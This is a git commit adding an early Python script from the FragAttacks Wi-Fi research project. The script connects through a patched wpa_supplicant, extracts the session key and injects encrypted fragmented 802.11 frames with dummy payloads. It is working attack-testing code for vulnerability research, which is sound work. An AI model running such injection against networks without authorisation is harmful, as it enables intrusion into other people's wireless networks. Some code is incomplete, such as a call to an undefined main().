fragattack: script to inject encrypted fragmented frames

2024-11-24 16:28:23 -05:00 · 2020-02-27 07:07:19 -05:00 · 2020-02-27 07:07:19 -05:00 · ef4a66fe56
commit ef4a66fe56
parent 0df030a726
2 changed files with 151 additions and 0 deletions
--- a/research/inject.py
+++ b/research/inject.py
@ -0,0 +1,150 @@
+#!/usr/bin/env python3
+from libwifi import*
+import sys, socket, struct, time, subprocess, atexit, select
+from wpaspy import Ctrl
+
+#def main(interface):
+#	conf.iface = interface + "mon"
+#	inject_fragmented()
+
+def wpaspy_clear_messages(ctrl):
+	# Clear old replies and messages from the hostapd control interface
+	while ctrl.pending():
+		ctrl.recv()
+
+def wpaspy_command(ctrl, cmd):
+	wpaspy_clear_messages(ctrl)
+	rval = ctrl.request(cmd)
+	if "UNKNOWN COMMAND" in rval:
+		log(ERROR, "wpa_supplicant did not recognize the command %s. Did you (re)compile wpa_supplicant?" % cmd.split()[0])
+		quit(1)
+	elif "FAIL" in rval:
+		log(ERROR, "Failed to execute command %s" % cmd)
+		quit(1)
+	return rval
+
+class FragAttack():
+	def __init__(self, interface):
+		self.nic_iface = interface
+		self.nic_mon = interface + "mon"
+		self.clientmac = None
+
+		self.sock  = None
+		self.wpasupp = None
+		self.wpasupp_ctrl = None
+
+		self.apmac = None
+		self.tk = None
+		self.pn = 0x99
+
+	def inject_fragments(self):
+		time.sleep(5)
+		payload1 = b"A" * 1450
+		payload2 = b"B" * 1450
+		seqnum = 0xAA
+		frag1 = Dot11(type="Data", FCfield="to-DS+MF", addr1=self.apmac, addr2=self.clientmac, addr3=self.clientmac, SC=(seqnum << 4) | 0)/Raw(payload1)
+		frag2 = Dot11(type="Data", FCfield="to-DS", addr1=self.apmac, addr2=self.clientmac, addr3=self.clientmac, SC=(seqnum << 4) | 1)/Raw(payload2)
+		if self.tk:
+			frag1 = encrypt_ccmp(frag1, self.tk, self.pn)
+			frag2 = encrypt_ccmp(frag2, self.tk, self.pn+1)
+			self.pn += 1000
+		sendp(RadioTap()/frag1, iface=self.nic_mon)
+		sendp(RadioTap()/frag2, iface=self.nic_mon)
+
+	def handle_rx(self):
+		p = self.sock.recv()
+		if p == None: return
+
+		#self.process_frame(p)
+
+	def get_tk(self):
+		self.tk = bytes.fromhex(wpaspy_command(self.wpasupp_ctrl, "GET tk"))
+		log(STATUS, "TK: " + self.tk.hex())
+
+	def handle_wpasupp(self):
+		while self.wpasupp_ctrl.pending():
+			msg =self.wpasupp_ctrl.recv()
+			log(STATUS, "wpasupp: " + msg)
+
+			if "CTRL-EVENT-CONNECTED" in msg:
+				p = re.compile("Connection to (.*) completed")
+				self.apmac = p.search(msg).group(1)
+				self.get_tk()
+				self.inject_fragments()
+
+	def configure_interfaces(self):
+		log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
+
+		# 0. Some users may forget this otherwise
+		subprocess.check_output(["rfkill", "unblock", "wifi"])
+
+		# 1. Remove unused virtual interfaces to start from a clean state
+		subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
+
+		# 2. Configure monitor mode on interfaces
+		subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
+		# Some kernels (Debian jessie - 3.16.0-4-amd64) don't properly add the monitor interface. The following ugly
+		# sequence of commands assures the virtual interface is properly registered as a 802.11 monitor interface.
+		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
+		time.sleep(0.5)
+		subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
+		subprocess.check_output(["ifconfig", self.nic_mon, "up"])
+
+	def run(self):
+		self.configure_interfaces()
+
+		self.sock = MonitorSocket(type=ETH_P_ALL, iface=self.nic_mon)
+
+		# Open the patched hostapd instance that carries out tests and let it start
+		log(STATUS, "Starting wpa_supplicant ...")
+		try:
+			self.wpasupp = subprocess.Popen([
+				"../wpa_supplicant/wpa_supplicant",
+				"-Dnl80211",
+				"-i", self.nic_iface,
+				"-cclient.conf"])
+		except:
+			if not os.path.exists("../wpa_supplicant/wpa_supplicant"):
+				log(ERROR, "wpa_supplicant executable not found. Did you compile wpa_supplicant? Use --help param for more info.")
+			raise
+		time.sleep(1)
+
+		# Open the wpa_supplicant client that will connect to the network that will be tested
+		self.clientmac = scapy.arch.get_if_hwaddr(self.nic_iface)
+		try:
+			self.wpasupp_ctrl = Ctrl("wpasupp_ctrl/" + self.nic_iface)
+			self.wpasupp_ctrl.attach()
+		except:
+			log(ERROR, "It seems wpa_supplicant did not start properly, please inspect its output.")
+			log(ERROR, "Did you disable Wi-Fi in the network manager? Otherwise wpa_supplicant won't work.")
+			raise
+
+		# Monitor the virtual monitor interface of the client and perform the needed actions
+		while True:
+			# TODO: Need to monitor self.wpasupp as well
+			sel = select.select([self.sock, self.wpasupp_ctrl.s], [], [], 1)
+			if self.sock in sel[0]: self.handle_rx()
+			if self.wpasupp_ctrl.s in sel[0]: self.handle_wpasupp()
+
+	def stop(self):
+		log(STATUS, "Closing wpa_supplicant and cleaning up ...")
+		if self.wpasupp:
+			self.wpasupp.terminate()
+			self.wpasupp.wait()
+		if self.sock: self.sock.close()
+
+
+def cleanup():
+	attack.stop()
+
+if __name__ == "__main__":
+	if len(sys.argv) != 2:
+		print("Usage:", sys.argv[0], "interface")
+		quit(1)
+
+	attack = FragAttack(sys.argv[1])
+	atexit.register(cleanup)
+	attack.run()
+
+	main()
+
--- a/research/wpaspy.py
+++ b/research/wpaspy.py
@ -0,0 +1 @@
+../wpaspy/wpaspy.py